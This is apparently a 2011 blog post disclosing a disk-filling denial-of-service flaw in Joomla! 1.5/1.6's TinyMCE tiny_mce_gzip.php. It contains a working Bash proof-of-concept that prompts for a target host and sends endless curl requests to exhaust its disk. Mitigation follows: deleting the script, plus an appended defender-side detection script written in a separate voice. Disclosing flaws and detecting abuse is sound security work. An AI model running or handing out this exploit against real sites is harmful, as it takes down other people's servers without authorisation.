Joomla! TinyMCE DOS
Posted in Joomla!
2011-04-05 15:23:03 +0000 UTC
Back in February, I reported an issue with TinyMCE to the Joomla! Security Strike Team. Since then, they "fixed" it in 1.6.1, but failed to do so for 1.5.23. Joomla! 1.5.x ships with a script that is supposed to cache gzipped copies of TinyMCE on disk; not only is this script never used by the editor, it also never cleans up the cache files it writes.
Without further ado, here is a POC Bash script that causes denial of service:
#!/bin/bash
# Exploit Title: Joomla! 1.5/1.6 TinyMCE Disk Space DOS
# Date: 25 February 2010
# Author: Jeff Channell
# Software Link: http://www.joomla.org

# header
clear
echo "###################################################"
echo "## Joomla! 1.5.23/1.6.0 TinyMCE Disk Space DOS ##"
echo "## 2011 jdc - for educational use only ##"
echo "###################################################"
echo ""
echo -n "Host: http://"
read MCEDOS_JOOMLAHOST
echo ""
echo -n "1.5 Mode? y/n: "
read MCEDOS_OLDJOOMLA

# 1.5 keeps the editor under plugins/, 1.6 under media/
MCEDOS_PART="media"
if [ "$MCEDOS_OLDJOOMLA" == "y" ]
then
  MCEDOS_PART="plugins"
fi

MCEDOS_USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
MCEDOS_ROOT_PATH="http://$MCEDOS_JOOMLAHOST/$MCEDOS_PART/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins="

echo ""
echo " * Filling up the drive of $MCEDOS_JOOMLAHOST ... Ctrl+C to quit"
echo ""
echo ""

while [ true ]; do
  MCEDOS_RANDOM=`date | md5sum | sed -e s/[^0-9a-f]//g`
  curl -H 'Accept-Encoding: gzip,deflate' -A "$MCEDOS_USERAGENT" "$MCEDOS_ROOT_PATH$MCEDOS_RANDOM" > /dev/null 2>&1 &
  echo -n "."
  sleep 1
done
Joomla! 1.5.x users can protect themselves by deleting plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php (thanks to Amy Stephen for the suggestion).
UPDATE: Those with shell but no shell-fu might find this helpful as well: find . -type f -name tiny_mce_gzip.php -exec rm {} \;
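The fix above is simply to delete the script. As an added example of my own (not from the post or from Joomla!), the following shell script lets an administrator confirm the script is gone from both the 1.5 (plugins/) and 1.6 (media/) locations and count access-log requests that hit it with diskcache=true, where a steadily growing set of distinct plugins= values is the signature of the cache-filling behaviour described above. The directory tree, log lines and IP addresses are constructed for the demo.

```shell
#!/bin/sh
# Added defender-side check (not from the original post): locate leftover
# tiny_mce_gzip.php files and measure diskcache=true traffic in an access log.
# The directory tree and log lines below are constructed for the demo.

# Print every tiny_mce_gzip.php beneath $1; return 1 if any is present.
find_gzip_scripts() {
    found=$(find "$1" -type f -name tiny_mce_gzip.php 2>/dev/null)
    [ -z "$found" ] && return 0
    printf '%s\n' "$found"
    return 1
}

# Number of requests to tiny_mce_gzip.php with diskcache=true in log $1.
count_diskcache_hits() {
    grep -c 'tiny_mce_gzip\.php?[^" ]*diskcache=true' "$1"
}

# Number of distinct plugins= values among those requests.
count_distinct_plugins() {
    grep -o 'tiny_mce_gzip\.php?[^" ]*diskcache=true[^" ]*' "$1" \
        | sed -n 's/.*plugins=\([^&" ]*\).*/\1/p' | sort -u | wc -l | tr -d ' '
}

# Build a throwaway 1.5-style tree plus a constructed access log; echo its path.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/plugins/editors/tinymce/jscripts/tiny_mce"
    : > "$d/plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php"
    cat > "$d/access.log" <<'EOF'
10.0.0.5 - - [05/Apr/2011:15:20:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [05/Apr/2011:15:20:02 +0000] "GET /plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins=0a1b2c HTTP/1.1" 200 10
10.0.0.9 - - [05/Apr/2011:15:20:03 +0000] "GET /plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins=3d4e5f HTTP/1.1" 200 10
10.0.0.9 - - [05/Apr/2011:15:20:04 +0000] "GET /plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins=3d4e5f HTTP/1.1" 200 10
10.0.0.7 - - [05/Apr/2011:15:20:05 +0000] "GET /plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=false&plugins=paste HTTP/1.1" 200 10
EOF
    echo "$d"
}

# Demo run against the constructed tree.
DEMO=$(make_demo)
echo "diskcache=true requests: $(count_diskcache_hits "$DEMO/access.log")"
echo "distinct plugins= values: $(count_distinct_plugins "$DEMO/access.log")"
find_gzip_scripts "$DEMO" || echo "tiny_mce_gzip.php still present; delete it"
rm -rf "$DEMO"
```

Point find_gzip_scripts at the real Joomla! document root and count_diskcache_hits at the real access log; both functions work unchanged on a live install.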